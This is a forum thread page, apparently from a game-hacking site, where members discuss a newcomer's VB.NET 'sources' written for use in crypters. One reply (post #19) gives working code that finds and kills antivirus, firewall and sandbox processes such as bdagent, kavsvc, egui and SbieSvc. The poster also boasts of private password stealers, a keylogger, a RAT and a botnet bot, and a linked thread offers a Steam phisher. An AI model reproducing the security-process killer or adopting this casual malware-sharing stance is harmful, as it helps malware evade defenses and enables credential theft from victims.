[VB.NET] My Sources... menu

User Tag List

Page 2 of 3 FirstFirst 123 LastLast
Results 16 to 30 of 31
  1. #16
    Vaqxine1's Avatar Member
    Reputation
    33
    Join Date
    Jul 2009
    Posts
    57
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You're supposed to take out the ones you want to use, not use all of them :3

    Normally anti-x's are used on programs such as crypters with checkbox options, so they need to all be seperated for whatever you're using them in. Nobody wants anti-everything. I appreciate the help, though.

    [VB.NET] My Sources...
  2. #17
    maclone's Avatar / Authenticator enabled
    Reputation
    2420
    Join Date
    Nov 2007
    Posts
    8,726
    Thanks G/R
    0/1029
    Trade Feedback
    0 (0%)
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Vaqxine1 View Post
    No, I don't know it at all, I just wrote all of these sources in a dream.
    Doesn't matter. Test it.
    It doesn't work. And you didn't write the sources, you just C&P them.
    And if they work in another way, you need to tell that before.
    Zomfg. And no, don't ask. - Dombo did it.

  3. #18
    Vaqxine1's Avatar Member
    Reputation
    33
    Join Date
    Jul 2009
    Posts
    57
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by maclone View Post
    It doesn't work. And you didn't write the sources, you just C&P them.
    And if they work in another way, you need to tell that before.
    Excuse me? Who are you to accuse me of copying and pasting my sources?

    Way to welcome a new member.
    I come here and share half of my sources and get this, wow. Says a lot.

  4. #19
    ReidE96's Avatar Archer Authenticator enabled
    Reputation
    470
    Join Date
    Dec 2006
    Posts
    1,625
    Thanks G/R
    1/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Just fyi, here's how I'd do yer first source:
    Code:
            Dim local As Process() = Process.GetProcesses
            Dim i As Integer
            For i = 0 To local.Length - 1
                Debug.WriteLine(local(i).ProcessName)
                    If Strings.UCase(local(i).ProcessName) = Strings.UCase("sample") Then local(i).Kill()
                    If Strings.UCase(local(i).ProcessName) = Strings.UCase("outpost") Then local(i).Kill()
                    If Strings.UCase(local(i).ProcessName) = Strings.UCase("npfmsg") Then local(i).Kill()
                    If Strings.UCase(local(i).ProcessName) = Strings.UCase("bdagent") Then local(i).Kill()
                    If Strings.UCase(local(i).ProcessName) = Strings.UCase("kavsvc") Then local(i).Kill()
                    If Strings.UCase(local(i).ProcessName) = Strings.UCase("egui") Then local(i).Kill()
                    If Strings.UCase(local(i).ProcessName) = Strings.UCase("zlclient") Then local(i).Kill()
                    If Strings.UCase(local(i).ProcessName) = Strings.UCase("SbieSvc") Then local(i).Kill()
            Next

  5. #20
    maclone's Avatar / Authenticator enabled
    Reputation
    2420
    Join Date
    Nov 2007
    Posts
    8,726
    Thanks G/R
    0/1029
    Trade Feedback
    0 (0%)
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Vaqxine1 View Post
    Excuse me? Who are you to accuse me of copying and pasting my sources?

    Way to welcome a new member.
    I come here and share half of my sources and get this, wow. Says a lot.
    After some research you seem to have written the sources, just that you're here and begin to spam 5+ threads within 5min lets you look like you're C&Ping them.
    And for a warm welcome, there is a thread in general section, otherwise you jump headfirst in cold water.
    Zomfg. And no, don't ask. - Dombo did it.

  6. #21
    Vaqxine1's Avatar Member
    Reputation
    33
    Join Date
    Jul 2009
    Posts
    57
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks Maclone...

    And uh, yes, these threads are copied and pasted, but they are mine.
    I posted them on another forum first, I have a couple more on another forum where I'm a VIP but it's maintenance right now...

    Just wanted to share them :3 MMOwned seems like a nice forum.

  7. #22
    ReidE96's Avatar Archer Authenticator enabled
    Reputation
    470
    Join Date
    Dec 2006
    Posts
    1,625
    Thanks G/R
    1/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    We're usually nice. But sometimes we eat people. Cypher does all the time.

  8. #23
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Not to be rude, but holy shit my eyes are bleeding. Learn some proper coding structure, and for the love of god, read MS's naming standards.

  9. #24
    Vaqxine1's Avatar Member
    Reputation
    33
    Join Date
    Jul 2009
    Posts
    57
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Apologies, Apoc :x

    I really struggle with focusing on things as well as doing more than one thing at once (badly, I have to visit my doctor fairly often), so a lot of my coding is done in a really bad order and I often end up repeating myself. I remember going over my keylogger builder after a while and there was a ton of code that I trimmed down which I didn't even notice the first few times.

    I don't tend to go over things twice though unless I'm going to use them properly.

  10. #25
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ignorance and laziness isn't a very good excuse, you know?

  11. #26
    Vaqxine1's Avatar Member
    Reputation
    33
    Join Date
    Jul 2009
    Posts
    57
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Pardon? Ignorance and laziness was not my excuse.

    I don't need to go over code I'm not going to use again so I don't do it.
    If it's not perfect the first time round and I'm not going to use it I'll just leave it as it is.

    I'm also not going to stress myself by tidying up my coding when I just don't need to.

  12. #27
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Had nothing to do with 'tidying it up', etc. Do it right the first time, and you won't need to tidy it up.

    On a serious note though; have you done anything besides little YouTube-esque tutorial crap? Y'know, like actual useful stuff?

  13. #28
    Vaqxine1's Avatar Member
    Reputation
    33
    Join Date
    Jul 2009
    Posts
    57
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Had nothing to do with 'tidying it up', etc. Do it right the first time, and you won't need to tidy it up.
    Like I said, I suck with logical thinking


    On a serious note though; have you done anything besides little YouTube-esque tutorial crap? Y'know, like actual useful stuff?
    These are only the sources that I want to post to public forums. I still have a lot off private stuff.
    My own crypter using random RC4 encryption, FileZilla password stealer, Firefox (all versions) password stealer & decrypter, keylogger, an unstable RAT, working on an IRC bot (the botnet type), memory pumper and a Rapidshare account checker using MSHTML. A lot of rogue stuff, really, I just tend to code things that I might need pretty often, or something that I think would be a good idea at the time.

  14. #29
    The Maffyx's Avatar Contributor

    Reputation
    249
    Join Date
    Feb 2007
    Posts
    1,186
    Thanks G/R
    0/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Memory pumper sounds hawt


  15. #30
    Vaqxine1's Avatar Member
    Reputation
    33
    Join Date
    Jul 2009
    Posts
    57
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It's pretty nice, yeah.

    I could post some of my executables here right (the VB category)?

    Just happy to be sharing :3

Page 2 of 3 FirstFirst 123 LastLast

Similar Threads

  1. [VB.NET] Steam Phisher Source
    By Vaqxine1 in forum Programming
    Replies: 6
    Last Post: 12-01-2009, 04:49 PM
  2. [RELEASE] GamerzWoW Launcher - VB9.NET Source!
    By whitekidney in forum World of Warcraft Bots and Programs
    Replies: 9
    Last Post: 04-26-2008, 03:59 PM
  3. [RELEASE] GamerzWoW Launcher - VB9.NET Source!
    By whitekidney in forum WoW EMU Programs
    Replies: 0
    Last Post: 04-26-2008, 11:48 AM
All times are GMT -5. The time now is 08:54 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search